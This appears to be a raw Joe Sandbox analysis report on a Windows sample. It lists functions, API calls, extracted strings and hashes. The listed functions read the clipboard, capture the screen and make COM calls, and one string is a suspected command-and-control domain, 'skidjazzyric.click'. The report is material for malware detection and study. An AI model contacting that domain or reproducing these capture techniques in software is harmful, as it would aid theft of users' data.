Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: ee078584dca13e788e7d6e14266956c172b54066e7d8b192639a4a5066c8a46f
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 8CD0123154512877D7002A94DC09BCE7B1CDF05B62F008421FB0DD9180C771994046E5

Function 0040DF92 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040DFA4

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 525ce6852620cf2250b72d132fea134f7b330ed63f2d069f63d9c038e588b8ce
Instruction ID: ccd3c5eb67ff0c959232c13284a4feb1b70bc0ce71dfd05ddd5b0dd8dbfc25b4
Opcode Fuzzy Hash: 525ce6852620cf2250b72d132fea134f7b330ed63f2d069f63d9c038e588b8ce
Instruction Fuzzy Hash: AAE04F763843026BE7688B789D57B01228697C5B28F368235F716AF2E5EAB474064909

Function 0040AB12 Relevance: 1.5, APIs: 1, Instructions: 20networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202), ref: 0040AB46

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
Instruction ID: 8daa5b18d499817a70b2f557c0c6df6f58e6f2abf740e83111143c9212bc1643
Opcode Fuzzy Hash: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
Instruction Fuzzy Hash: 0AE02B7A5D5104BBF2486751FD4FC563616BB4330AB08413DFC185017BD6511426C66A

Function 0043EB40 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B9C7,00000000,00000001), ref: 0043EB60

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
Instruction ID: 6306fd139b63709815d779222b474fbda691f96f30962fae2caf2063fc0eb5d0
Opcode Fuzzy Hash: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
Instruction Fuzzy Hash: FDD0C931445536FBC6102F28BC06BCB3B94EF497A5F0708A5F540AA075E725DC918AD8

Function 004404B1 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 004404BF

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
Instruction ID: 7f86c14d6ce35f706de72b94d0a04e46592ace6e5707a2a12f6891b8fa8e10aa
Opcode Fuzzy Hash: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
Instruction Fuzzy Hash: 15E0E2B9900214DBEB44CF68FC9592933B5EB8B3093040439E202C3362EA34E602CF59

Function 0043EB20 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,E931068D,004089CF,6W01), ref: 0043EB30

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
Instruction ID: faa30900258afa928b287b4fa720072893bcbdc8cd762d9751037a3417221d58
Opcode Fuzzy Hash: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
Instruction Fuzzy Hash: 91C04C31045120ABD5506B15EC05BC63B54DF852A5F020065B105660718660ACC2C698

Function 006CA105 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006CA156

Memory Dump Source

Source File: 00000000.00000002.1934907231.00000000006C9000.00000040.00000020.00020000.00000000.sdmp, Offset: 006C9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 1341e3133d85a65ea876916ef27930ac5627ad9e9e1f22e240169a1abc722225
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 26113C79A00208EFDB01DF98C985E98BBF5EF08350F0980A4F9489B362D371EA50DF91

Non-executed Functions

Function 00423EFF Relevance: 72.8, Strings: 58, Instructions: 350COMMON

Download Yara Rule

Strings

q, xrefs: 00423FDE
n, xrefs: 00424257
@, xrefs: 00424263
&, xrefs: 00423FCA
2, xrefs: 00423FC6
B, xrefs: 00424144
x, xrefs: 004241FA
V, xrefs: 00423F52
-, xrefs: 004241BB
&, xrefs: 0042414B
l, xrefs: 0042425F
@, xrefs: 00424152
h, xrefs: 0042424F
d, xrefs: 0042423F
~, xrefs: 00424208
>, xrefs: 00423FEA
?, xrefs: 00423F42
v, xrefs: 004241D0
4, xrefs: 00423FE2
1, xrefs: 00423FC2
f, xrefs: 00423FEE
N, xrefs: 00424198
:, xrefs: 00424253
skidjazzyric.click, xrefs: 00424487
8, xrefs: 00423F4A
(, xrefs: 004241AD
X, xrefs: 0042411A
2B309B639C22768FD0632DF0E28DC412, xrefs: 004240BF
h, xrefs: 00424175
>, xrefs: 00423F4E
0, xrefs: 00423FE6
/, xrefs: 00423F46
`, xrefs: 0042422F
0, xrefs: 00423FD2
p, xrefs: 004241C2
A, xrefs: 004243AC
t, xrefs: 004241DE
1, xrefs: 00423FDA
\, xrefs: 00424136
j, xrefs: 00424247
N, xrefs: 0042439E
}, xrefs: 00424390
r, xrefs: 004241B4
H, xrefs: 0042418A
|, xrefs: 00424216
?, xrefs: 00424183
D, xrefs: 0042416E
n, xrefs: 00423FCE
F, xrefs: 00424160
^, xrefs: 00424128
x, xrefs: 00423F3E
Q, xrefs: 004241C9
7, xrefs: 00423FD6
f, xrefs: 00424237
b, xrefs: 00424224
L, xrefs: 004241A6
J, xrefs: 0042417C
z, xrefs: 004241EC

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: &$&$($-$/$0$0$1$1$2$2B309B639C22768FD0632DF0E28DC412$4$7$8$:$>$>$?$?$@$@$A$B$D$F$H$J$L$N$N$Q$V$X$\$^$`$b$d$f$f$h$h$j$l$n$n$p$q$r$skidjazzyric.click$t$v$x$x$z$|$}$~
API String ID: 0-2652012874
Opcode ID: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
Instruction ID: 27bd2a0d4c2ee2dbe7fab43400867feab0dee6ac78a78b22b0fd1ff9dbe20428
Opcode Fuzzy Hash: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
Instruction Fuzzy Hash: 45026021D087D989DB22C67C8C483CDBFA11B63324F4843EDD5E86B3D6D6B90946CB66

Function 00684166 Relevance: 72.8, Strings: 58, Instructions: 350COMMON

Download Yara Rule

Strings

|, xrefs: 0068447D
-, xrefs: 00684422
n, xrefs: 00684235
4, xrefs: 00684249
h, xrefs: 006843DC
~, xrefs: 0068446F
z, xrefs: 00684453
^, xrefs: 0068438F
f, xrefs: 00684255
X, xrefs: 00684381
Q, xrefs: 00684430
`, xrefs: 00684496
1, xrefs: 00684229
0, xrefs: 00684239
0, xrefs: 0068424D
&, xrefs: 006843B2
p, xrefs: 00684429
j, xrefs: 006844AE
b, xrefs: 0068448B
A, xrefs: 00684613
:, xrefs: 006844BA
?, xrefs: 006843EA
l, xrefs: 006844C6
1, xrefs: 00684241
r, xrefs: 0068441B
&, xrefs: 00684231
f, xrefs: 0068449E
q, xrefs: 00684245
x, xrefs: 00684461
d, xrefs: 006844A6
\, xrefs: 0068439D
>, xrefs: 00684251
>, xrefs: 006841B5
2, xrefs: 0068422D
x, xrefs: 006841A5
/, xrefs: 006841AD
2B309B639C22768FD0632DF0E28DC412, xrefs: 00684326
L, xrefs: 0068440D
7, xrefs: 0068423D
n, xrefs: 006844BE
B, xrefs: 006843AB
t, xrefs: 00684445
J, xrefs: 006843E3
skidjazzyric.click, xrefs: 006846EE
N, xrefs: 006843FF
F, xrefs: 006843C7
N, xrefs: 00684605
@, xrefs: 006844CA
(, xrefs: 00684414
V, xrefs: 006841B9
8, xrefs: 006841B1
?, xrefs: 006841A9
v, xrefs: 00684437
H, xrefs: 006843F1
@, xrefs: 006843B9
}, xrefs: 006845F7
h, xrefs: 006844B6
D, xrefs: 006843D5

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: &$&$($-$/$0$0$1$1$2$2B309B639C22768FD0632DF0E28DC412$4$7$8$:$>$>$?$?$@$@$A$B$D$F$H$J$L$N$N$Q$V$X$\$^$`$b$d$f$f$h$h$j$l$n$n$p$q$r$skidjazzyric.click$t$v$x$x$z$|$}$~
API String ID: 0-2652012874
Opcode ID: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
Instruction ID: 370913ae8882ebec81b70cb7aa59f9c700b25bcc010487e040a2a66506a9284b
Opcode Fuzzy Hash: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
Instruction Fuzzy Hash: F7027221D087D989DB22C67C8C483DDBFA11B63324F1883DDD1E86B3D6D6B90546CB66

Function 0043A4EF Relevance: 55.3, Strings: 44, Instructions: 311COMMON

Download Yara Rule

Strings

e, xrefs: 0043A58E
}, xrefs: 0043A636
A, xrefs: 0043A652
o, xrefs: 0043A7EE
y, xrefs: 0043A61A
o, xrefs: 0043A5D4
m, xrefs: 0043A7E0
u, xrefs: 0043A5FE
{, xrefs: 0043A628
m, xrefs: 0043A5C6
<, xrefs: 0043A75B
:, xrefs: 0043A509
M, xrefs: 0043A6A6
g, xrefs: 0043A59C
a, xrefs: 0043A78C
C, xrefs: 0043A660
e, xrefs: 0043A7A8
@+p, xrefs: 0043A9C2
a, xrefs: 0043A572
x, xrefs: 0043A533
0, xrefs: 0043A936
D, xrefs: 0043A4FB
k, xrefs: 0043A5B8
G, xrefs: 0043A67C
9, xrefs: 0043A541
c, xrefs: 0043A580
>, xrefs: 0043A764
+, xrefs: 0043A55D
L, xrefs: 0043A69F
n, xrefs: 0043A7E7
=, xrefs: 0043A517
w, xrefs: 0043A60C
g, xrefs: 0043A7B6
s, xrefs: 0043A5F0
i, xrefs: 0043A5AA
%, xrefs: 0043A525
K, xrefs: 0043A698
3, xrefs: 0043A54F
I, xrefs: 0043A68A
c, xrefs: 0043A79A
k, xrefs: 0043A7D2
q, xrefs: 0043A5E2
i, xrefs: 0043A7C4
E, xrefs: 0043A66E

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: %$+$0$3$9$:$<$=$>$@+p$A$C$D$E$G$I$K$L$M$a$a$c$c$e$e$g$g$i$i$k$k$m$m$n$o$o$q$s$u$w$x$y${$}
API String ID: 0-2532112192
Opcode ID: 5c6dbee6ecf3bd3c3c628f116cafe9bcc0538f1137003045660c0d61d6d29134
Instruction ID: 5a335782380f72e06434a0b7d1c84293c6c1cbd051fad8399b30b8532d7f13f9
Opcode Fuzzy Hash: 5c6dbee6ecf3bd3c3c628f116cafe9bcc0538f1137003045660c0d61d6d29134
Instruction Fuzzy Hash: 0EF170319086E98ADB22C63C8C443DDBFB15B56324F0847D9D0A96B3D2C7794F86CB66

Function 0069A756 Relevance: 55.3, Strings: 44, Instructions: 311COMMON

Download Yara Rule

Strings

+, xrefs: 0069A7C4
<, xrefs: 0069A9C2
D, xrefs: 0069A762
g, xrefs: 0069AA1D
9, xrefs: 0069A7A8
a, xrefs: 0069A9F3
e, xrefs: 0069AA0F
k, xrefs: 0069A81F
s, xrefs: 0069A857
E, xrefs: 0069A8D5
m, xrefs: 0069A82D
I, xrefs: 0069A8F1
c, xrefs: 0069A7E7
a, xrefs: 0069A7D9
g, xrefs: 0069A803
q, xrefs: 0069A849
@+p, xrefs: 0069AC29
o, xrefs: 0069A83B
u, xrefs: 0069A865
n, xrefs: 0069AA4E
m, xrefs: 0069AA47
L, xrefs: 0069A906
A, xrefs: 0069A8B9
o, xrefs: 0069AA55
M, xrefs: 0069A90D
x, xrefs: 0069A79A
e, xrefs: 0069A7F5
w, xrefs: 0069A873
>, xrefs: 0069A9CB
%, xrefs: 0069A78C
{, xrefs: 0069A88F
K, xrefs: 0069A8FF
:, xrefs: 0069A770
G, xrefs: 0069A8E3
i, xrefs: 0069AA2B
=, xrefs: 0069A77E
}, xrefs: 0069A89D
3, xrefs: 0069A7B6
c, xrefs: 0069AA01
0, xrefs: 0069AB9D
y, xrefs: 0069A881
k, xrefs: 0069AA39
C, xrefs: 0069A8C7
i, xrefs: 0069A811

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: %$+$0$3$9$:$<$=$>$@+p$A$C$D$E$G$I$K$L$M$a$a$c$c$e$e$g$g$i$i$k$k$m$m$n$o$o$q$s$u$w$x$y${$}
API String ID: 0-2532112192
Opcode ID: 0e20f868d951b71e29e37dcac279c8b11e3bc4ef153ff36d24d69365c9a94d1d
Instruction ID: 5fffec32a4de278c2131713cab5d599d0cea74b48dd7d4451527d608fa72a0c4
Opcode Fuzzy Hash: 0e20f868d951b71e29e37dcac279c8b11e3bc4ef153ff36d24d69365c9a94d1d
Instruction Fuzzy Hash: 0AF161319086E98ADB32C63C8C443DDBFA25B52324F0847D9D4A96B3D2C7754F86CB62

Function 00439923 Relevance: 51.6, Strings: 41, Instructions: 391COMMON

Download Yara Rule

Strings

f, xrefs: 00439E23
T, xrefs: 00439BCF
~, xrefs: 00439B3F
-, xrefs: 004399AD
G, xrefs: 00439AD7
=, xrefs: 00439B8F
_, xrefs: 00439ABF
O, xrefs: 00439D16
2, xrefs: 00439A55
F, xrefs: 00439A97
r, xrefs: 00439BB7
7, xrefs: 00439A71
@+p, xrefs: 00439EBE
i, xrefs: 00439B2F
S, xrefs: 00439D26
*, xrefs: 00439A7F
{, xrefs: 00439B77
S, xrefs: 00439A8F
x, xrefs: 00439B7F
1, xrefs: 004399BB
$, xrefs: 004399E5
], xrefs: 00439ACF
4, xrefs: 00439DFF
H, xrefs: 00439AEF
j, xrefs: 00439B37
t, xrefs: 00439B5F
e, xrefs: 00439E1C
i, xrefs: 00439B6F
<, xrefs: 00439A0F
5, xrefs: 004399D7
=, xrefs: 00439A01
Y, xrefs: 00439AE7
s, xrefs: 00439B4F
w, xrefs: 00439B17
Z, xrefs: 00439AF7
=, xrefs: 00439A1D
c, xrefs: 00439B07
I, xrefs: 00439D0E
j, xrefs: 00439B1F
F, xrefs: 00439AC7
U, xrefs: 00439AFF

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: $$*$-$1$2$4$5$7$<$=$=$=$@+p$F$F$G$H$I$O$S$S$T$U$Y$Z$]$_$c$e$f$i$i$j$j$r$s$t$w$x${$~
API String ID: 0-2361624355
Opcode ID: f86ff687baa644721faa94586d0f4356f2d95a52b60ef36798eae4a41bc52f90
Instruction ID: be7a992d2d4842197a1748c1c2319ac7c28ec811ade833faf29c06d267706092
Opcode Fuzzy Hash: f86ff687baa644721faa94586d0f4356f2d95a52b60ef36798eae4a41bc52f90
Instruction Fuzzy Hash: E8224F219087EA89DB32C67C8C483CDBFA15B67224F1843D9D4F86B3D6C7750A46CB66

Function 00699B8A Relevance: 51.6, Strings: 41, Instructions: 391COMMON

Download Yara Rule

Strings

e, xrefs: 0069A083
-, xrefs: 00699C14
w, xrefs: 00699D7E
S, xrefs: 00699CF6
i, xrefs: 00699DD6
U, xrefs: 00699D66
=, xrefs: 00699DF6
{, xrefs: 00699DDE
f, xrefs: 0069A08A
=, xrefs: 00699C68
1, xrefs: 00699C22
*, xrefs: 00699CE6
j, xrefs: 00699D86
O, xrefs: 00699F7D
r, xrefs: 00699E1E
I, xrefs: 00699F75
@+p, xrefs: 0069A125
t, xrefs: 00699DC6
j, xrefs: 00699D9E
F, xrefs: 00699D2E
7, xrefs: 00699CD8
2, xrefs: 00699CBC
s, xrefs: 00699DB6
5, xrefs: 00699C3E
], xrefs: 00699D36
i, xrefs: 00699D96
F, xrefs: 00699CFE
c, xrefs: 00699D6E
=, xrefs: 00699C84
H, xrefs: 00699D56
$, xrefs: 00699C4C
S, xrefs: 00699F8D
T, xrefs: 00699E36
G, xrefs: 00699D3E
Y, xrefs: 00699D4E
4, xrefs: 0069A066
~, xrefs: 00699DA6
<, xrefs: 00699C76
_, xrefs: 00699D26
Z, xrefs: 00699D5E
x, xrefs: 00699DE6

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: $$*$-$1$2$4$5$7$<$=$=$=$@+p$F$F$G$H$I$O$S$S$T$U$Y$Z$]$_$c$e$f$i$i$j$j$r$s$t$w$x${$~
API String ID: 0-2361624355
Opcode ID: c3789e24d09f43a8b0542d61fba22105114c5098dcea2457330ee2163c950db7
Instruction ID: cf4429dc5a8d5f20d803b975df32550f6553c6b5113e9955b419cd42b07f123c
Opcode Fuzzy Hash: c3789e24d09f43a8b0542d61fba22105114c5098dcea2457330ee2163c950db7
Instruction Fuzzy Hash: AA2251219087EA89DB32C67C8C483CDBFA15B67324F1843D9D4E86B3D6C7750A46CB66

Function 0069BAD7 Relevance: 32.4, APIs: 8, Strings: 10, Instructions: 880memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(CDCCD3E7,00000000,00000001,?,00000000), ref: 0069BF33
SysAllocString.OLEAUT32(37C935C6), ref: 0069BFAD
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0069BFEB
SysAllocString.OLEAUT32(37C935C6), ref: 0069C050
SysAllocString.OLEAUT32(37C935C6), ref: 0069C137
VariantInit.OLEAUT32(?), ref: 0069C1A5

Strings

F*R(, xrefs: 0069C091
k"@ , xrefs: 0069C0A1
#~|, xrefs: 0069BB0E
#~|, xrefs: 0069BB04
[&h$, xrefs: 0069C099
M, xrefs: 0069BDC2
:;$%, xrefs: 0069C553
96, xrefs: 0069C0B9
n:T8, xrefs: 0069C0B1
e?^, xrefs: 0069BEB6

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
API String ID: 65563702-2807872674
Opcode ID: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
Instruction ID: 9691dd1204cee9266078d4efc76d4c20defd371ed40e8e17fb0a01ef733f17b4
Opcode Fuzzy Hash: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
Instruction Fuzzy Hash: AD52F0726083408BDB24CF28C8917ABBBE6EFC5724F188A2DE59597391D774D806CB52

Function 00436980 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 230windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00436989
GetSystemMetrics.USER32(0000004C), ref: 00436999
GetSystemMetrics.USER32(0000004D), ref: 004369A1
GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
DeleteObject.GDI32(00000000), ref: 004369C1
CreateCompatibleDC.GDI32(00000000), ref: 004369D0
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
SelectObject.GDI32(00000000,00000000), ref: 004369E7
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A

Strings

Y, xrefs: 00436BEE

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
String ID: Y
API String ID: 1298755333-3233089245
Opcode ID: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
Instruction ID: ce6842184c50d62c14bce23637ee5c5f438d7dfa952fd3edf86735d4080956a5
Opcode Fuzzy Hash: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
Instruction Fuzzy Hash: 4A81C33A158310EFD7489FB4AC49A3B7BA5FB8A352F050C3CF546D2290C73995168B2B

Function 004367F0 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 109clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00436804
GetClipboardData.USER32 ref: 0043681F
GlobalLock.KERNEL32 ref: 00436838
GetWindowLongW.USER32 ref: 0043689D
GlobalUnlock.KERNEL32 ref: 00436959
CloseClipboard.USER32 ref: 00436962

Strings

F, xrefs: 004368E0
@, xrefs: 004368EA
B, xrefs: 004368C7
O, xrefs: 004368CC
E, xrefs: 004368B3
K, xrefs: 004368E5
t, xrefs: 004368D6
{, xrefs: 004368BD
C, xrefs: 004368B8
N, xrefs: 004368C2
}, xrefs: 004368D1

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: @$B$C$E$F$K$N$O$t${$}
API String ID: 2832541153-984153585
Opcode ID: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
Instruction ID: d12379fae56aa42f0d26b1a9ba346e1c7749dd96ee15ae9ce42ccc61be201c2c
Opcode Fuzzy Hash: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
Instruction Fuzzy Hash: 65418FB050C3818ED301EF78D58931FBFE0AF96318F05492EE4C996292D67D8549CBAB

Function 00425100 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 480COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 004251AA
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00425243

Strings

]RB, xrefs: 00425257
?P:V, xrefs: 004253B3
+$e, xrefs: 004251F2
%\)R, xrefs: 004253AB
1D6Z, xrefs: 0042539B
C`<f, xrefs: 004253D3
XY, xrefs: 00425146
+$e, xrefs: 00425165, 0042517A
.T'j, xrefs: 004253BB
:@&F, xrefs: 00425393
,X*^, xrefs: 004253A3

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: +$e$+$e$%\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f$XY$]RB
API String ID: 237503144-2846770461
Opcode ID: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
Instruction ID: b6d59b0557f70d7ec2d4011febfa6e18cf4a5b2df19338a98cc8181bc2575411
Opcode Fuzzy Hash: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
Instruction Fuzzy Hash: E7F1EDB4208350DFD310DF69E89166BBBE0FFC5314F54892DE5958B362E7B88906CB46

Function 00425D6A Relevance: 17.0, Strings: 13, Instructions: 778COMMON

Download Yara Rule

Strings

Wdz, xrefs: 00426396
T`Sf, xrefs: 0042638C
(X#^, xrefs: 00426350
2E1G, xrefs: 00426876
4D2Z, xrefs: 00426346
8I>K, xrefs: 00426858
-T,j, xrefs: 0042636E
@+p, xrefs: 00426956
&$, xrefs: 004266A0
+\1R, xrefs: 0042635A
uVw, xrefs: 00425EA0
$@7F, xrefs: 0042633C
qs, xrefs: 00425E96

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$@+p$T`Sf$Wdz$&$$qs$uVw
API String ID: 0-565072403
Opcode ID: b98f95cc8d7a7bfe044da580c8a45b468910242ccf89acd057331744f3faff64
Instruction ID: c261d025133841230159ca5431fd9423a817dc7e9349410c690f11e8db15d26c
Opcode Fuzzy Hash: b98f95cc8d7a7bfe044da580c8a45b468910242ccf89acd057331744f3faff64
Instruction Fuzzy Hash: FA7283B4A05269CFDB24CF55D881BDDBBB2FB46300F1181E9C5496B362DB349A86CF84

Function 00419840 Relevance: 16.7, APIs: 2, Strings: 7, Instructions: 936COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 00419CE7
FreeLibrary.KERNEL32(?), ref: 00419D24

Part of subcall function 004402C0: LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE

Strings

vt, xrefs: 00419AFC
tj, xrefs: 00419BBA
pv, xrefs: 00419BB2
SP, xrefs: 00419BF2
@+p, xrefs: 00419864, 00419946, 0041999D, 00419A51, 00419C63, 00419C95, 00419CFF, 00419D38, 00419DB4, 00419E93, 00419F54, 00419FB0, 0041A09C, 0041A135, 0041A1DB, 0041A332, 0041A3B2
